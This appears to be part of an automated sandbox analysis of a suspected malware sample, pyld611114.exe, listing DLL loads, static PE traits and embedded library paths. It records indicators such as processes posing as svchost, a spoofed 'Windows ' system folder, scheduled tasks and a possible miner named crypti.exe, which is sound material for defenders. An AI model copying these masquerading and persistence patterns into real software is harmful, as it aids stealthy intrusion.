Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exeSection loaded: printui.dll
Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libpq.dll
Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libssl-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libintl-9.dll
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libwinpthread-1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libiconv-2.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: pyld611114.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: pyld611114.exeStatic file information: File size 15180800 > 1048576
Source: pyld611114.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xe37000
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: pyld611114.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3450709409.00007FFD93F8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
